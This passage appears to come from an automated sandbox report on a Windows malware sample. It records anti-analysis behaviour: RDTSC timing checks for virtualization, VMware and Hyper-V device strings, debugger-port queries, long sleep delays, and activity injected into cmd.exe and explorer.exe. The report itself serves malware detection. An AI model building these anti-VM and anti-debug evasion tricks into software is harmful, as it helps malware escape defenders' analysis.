          Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 2F69904 second address: 2F6990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 2F69B6E second address: 2F69B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeMemory allocated: 1610000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeMemory allocated: 3360000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeMemory allocated: 9BF0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeMemory allocated: ABF0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeMemory allocated: AE10000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeMemory allocated: BE10000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2474Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7467Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 887Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 864Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 2219Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 7753Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-13961
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\cmd.exeAPI coverage: 1.0 %
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe TID: 7536Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 8132Thread sleep count: 2474 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 8132Thread sleep time: -4948000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 8132Thread sleep count: 7467 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 8132Thread sleep time: -14934000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7916Thread sleep count: 2219 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7916Thread sleep time: -4438000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7916Thread sleep count: 7753 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7916Thread sleep time: -15506000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0025589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,4_2_0025589A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00250207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,4_2_00250207
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00263E66 FindFirstFileW,FindNextFileW,FindClose,4_2_00263E66
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00254EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00254EC1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0024532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,4_2_0024532E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000003.00000000.1735394383.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000002.4176155250.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000003.00000002.4176155250.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000003.00000000.1735394383.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000002.4168908689.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000003.00000002.4177203521.000000000997A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000003.00000002.4176155250.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000003.00000000.1738643727.000000000C9FE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b};
          Source: explorer.exe, 00000003.00000003.3107210219.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3107210219.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000002.4177203521.000000000997A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000003.00000002.4172464480.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1728291050.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000003.00000002.4168908689.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000002.4176050709.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000003.00000002.4168908689.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0040ACE0 LdrLoadDll,2_2_0040ACE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00262E37 IsDebuggerPresent,4_2_00262E37
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0180C188 mov eax, dword ptr fs:[00000030h]2_2_0180C188
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0180C188 mov eax, dword ptr fs:[00000030h]2_2_0180C188
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01756154 mov eax, dword ptr fs:[00000030h]2_2_01756154
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01756154 mov eax, dword ptr fs:[00000030h]2_2_01756154
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174C156 mov eax, dword ptr fs:[00000030h]2_2_0174C156
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E8158 mov eax, dword ptr fs:[00000030h]2_2_017E8158
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E4144 mov eax, dword ptr fs:[00000030h]2_2_017E4144
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E4144 mov eax, dword ptr fs:[00000030h]2_2_017E4144
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E4144 mov ecx, dword ptr fs:[00000030h]2_2_017E4144
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E4144 mov eax, dword ptr fs:[00000030h]2_2_017E4144
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E4144 mov eax, dword ptr fs:[00000030h]2_2_017E4144
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018161C3 mov eax, dword ptr fs:[00000030h]2_2_018161C3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018161C3 mov eax, dword ptr fs:[00000030h]2_2_018161C3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01780124 mov eax, dword ptr fs:[00000030h]2_2_01780124
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FA118 mov ecx, dword ptr fs:[00000030h]2_2_017FA118
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FA118 mov eax, dword ptr fs:[00000030h]2_2_017FA118
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FA118 mov eax, dword ptr fs:[00000030h]2_2_017FA118
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FA118 mov eax, dword ptr fs:[00000030h]2_2_017FA118
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018261E5 mov eax, dword ptr fs:[00000030h]2_2_018261E5
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE10E mov eax, dword ptr fs:[00000030h]2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE10E mov ecx, dword ptr fs:[00000030h]2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE10E mov eax, dword ptr fs:[00000030h]2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE10E mov eax, dword ptr fs:[00000030h]2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE10E mov ecx, dword ptr fs:[00000030h]2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE10E mov eax, dword ptr fs:[00000030h]2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE10E mov eax, dword ptr fs:[00000030h]2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE10E mov ecx, dword ptr fs:[00000030h]2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE10E mov eax, dword ptr fs:[00000030h]2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE10E mov ecx, dword ptr fs:[00000030h]2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017801F8 mov eax, dword ptr fs:[00000030h]2_2_017801F8
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01810115 mov eax, dword ptr fs:[00000030h]2_2_01810115
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CE1D0 mov eax, dword ptr fs:[00000030h]2_2_017CE1D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CE1D0 mov eax, dword ptr fs:[00000030h]2_2_017CE1D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CE1D0 mov ecx, dword ptr fs:[00000030h]2_2_017CE1D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CE1D0 mov eax, dword ptr fs:[00000030h]2_2_017CE1D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CE1D0 mov eax, dword ptr fs:[00000030h]2_2_017CE1D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D019F mov eax, dword ptr fs:[00000030h]2_2_017D019F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D019F mov eax, dword ptr fs:[00000030h]2_2_017D019F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D019F mov eax, dword ptr fs:[00000030h]2_2_017D019F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D019F mov eax, dword ptr fs:[00000030h]2_2_017D019F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174A197 mov eax, dword ptr fs:[00000030h]2_2_0174A197
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174A197 mov eax, dword ptr fs:[00000030h]2_2_0174A197
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174A197 mov eax, dword ptr fs:[00000030h]2_2_0174A197
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824164 mov eax, dword ptr fs:[00000030h]2_2_01824164
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824164 mov eax, dword ptr fs:[00000030h]2_2_01824164
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01790185 mov eax, dword ptr fs:[00000030h]2_2_01790185
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F4180 mov eax, dword ptr fs:[00000030h]2_2_017F4180
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F4180 mov eax, dword ptr fs:[00000030h]2_2_017F4180
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177C073 mov eax, dword ptr fs:[00000030h]2_2_0177C073
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01752050 mov eax, dword ptr fs:[00000030h]2_2_01752050
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D6050 mov eax, dword ptr fs:[00000030h]2_2_017D6050
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018160B8 mov eax, dword ptr fs:[00000030h]2_2_018160B8
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018160B8 mov ecx, dword ptr fs:[00000030h]2_2_018160B8
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E6030 mov eax, dword ptr fs:[00000030h]2_2_017E6030
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174A020 mov eax, dword ptr fs:[00000030h]2_2_0174A020
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174C020 mov eax, dword ptr fs:[00000030h]2_2_0174C020
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176E016 mov eax, dword ptr fs:[00000030h]2_2_0176E016
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176E016 mov eax, dword ptr fs:[00000030h]2_2_0176E016
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176E016 mov eax, dword ptr fs:[00000030h]2_2_0176E016
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176E016 mov eax, dword ptr fs:[00000030h]2_2_0176E016
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D4000 mov ecx, dword ptr fs:[00000030h]2_2_017D4000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F2000 mov eax, dword ptr fs:[00000030h]2_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F2000 mov eax, dword ptr fs:[00000030h]2_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F2000 mov eax, dword ptr fs:[00000030h]2_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F2000 mov eax, dword ptr fs:[00000030h]2_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F2000 mov eax, dword ptr fs:[00000030h]2_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F2000 mov eax, dword ptr fs:[00000030h]2_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F2000 mov eax, dword ptr fs:[00000030h]2_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F2000 mov eax, dword ptr fs:[00000030h]2_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174C0F0 mov eax, dword ptr fs:[00000030h]2_2_0174C0F0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017920F0 mov ecx, dword ptr fs:[00000030h]2_2_017920F0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0174A0E3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017580E9 mov eax, dword ptr fs:[00000030h]2_2_017580E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D60E0 mov eax, dword ptr fs:[00000030h]2_2_017D60E0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D20DE mov eax, dword ptr fs:[00000030h]2_2_017D20DE
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017480A0 mov eax, dword ptr fs:[00000030h]2_2_017480A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E80A8 mov eax, dword ptr fs:[00000030h]2_2_017E80A8
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175208A mov eax, dword ptr fs:[00000030h]2_2_0175208A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F437C mov eax, dword ptr fs:[00000030h]2_2_017F437C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D035C mov eax, dword ptr fs:[00000030h]2_2_017D035C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D035C mov eax, dword ptr fs:[00000030h]2_2_017D035C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D035C mov eax, dword ptr fs:[00000030h]2_2_017D035C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D035C mov ecx, dword ptr fs:[00000030h]2_2_017D035C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D035C mov eax, dword ptr fs:[00000030h]2_2_017D035C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D035C mov eax, dword ptr fs:[00000030h]2_2_017D035C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F8350 mov ecx, dword ptr fs:[00000030h]2_2_017F8350
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0180C3CD mov eax, dword ptr fs:[00000030h]2_2_0180C3CD
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174C310 mov ecx, dword ptr fs:[00000030h]2_2_0174C310
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01770310 mov ecx, dword ptr fs:[00000030h]2_2_01770310
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178A30B mov eax, dword ptr fs:[00000030h]2_2_0178A30B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178A30B mov eax, dword ptr fs:[00000030h]2_2_0178A30B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178A30B mov eax, dword ptr fs:[00000030h]2_2_0178A30B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176E3F0 mov eax, dword ptr fs:[00000030h]2_2_0176E3F0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176E3F0 mov eax, dword ptr fs:[00000030h]2_2_0176E3F0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176E3F0 mov eax, dword ptr fs:[00000030h]2_2_0176E3F0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017863FF mov eax, dword ptr fs:[00000030h]2_2_017863FF
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017603E9 mov eax, dword ptr fs:[00000030h]2_2_017603E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017603E9 mov eax, dword ptr fs:[00000030h]2_2_017603E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017603E9 mov eax, dword ptr fs:[00000030h]2_2_017603E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017603E9 mov eax, dword ptr fs:[00000030h]2_2_017603E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017603E9 mov eax, dword ptr fs:[00000030h]2_2_017603E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017603E9 mov eax, dword ptr fs:[00000030h]2_2_017603E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017603E9 mov eax, dword ptr fs:[00000030h]2_2_017603E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017603E9 mov eax, dword ptr fs:[00000030h]2_2_017603E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE3DB mov eax, dword ptr fs:[00000030h]2_2_017FE3DB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE3DB mov eax, dword ptr fs:[00000030h]2_2_017FE3DB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE3DB mov ecx, dword ptr fs:[00000030h]2_2_017FE3DB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE3DB mov eax, dword ptr fs:[00000030h]2_2_017FE3DB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F43D4 mov eax, dword ptr fs:[00000030h]2_2_017F43D4
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F43D4 mov eax, dword ptr fs:[00000030h]2_2_017F43D4
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A3C0 mov eax, dword ptr fs:[00000030h]2_2_0175A3C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A3C0 mov eax, dword ptr fs:[00000030h]2_2_0175A3C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A3C0 mov eax, dword ptr fs:[00000030h]2_2_0175A3C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A3C0 mov eax, dword ptr fs:[00000030h]2_2_0175A3C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A3C0 mov eax, dword ptr fs:[00000030h]2_2_0175A3C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A3C0 mov eax, dword ptr fs:[00000030h]2_2_0175A3C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017583C0 mov eax, dword ptr fs:[00000030h]2_2_017583C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017583C0 mov eax, dword ptr fs:[00000030h]2_2_017583C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017583C0 mov eax, dword ptr fs:[00000030h]2_2_017583C0
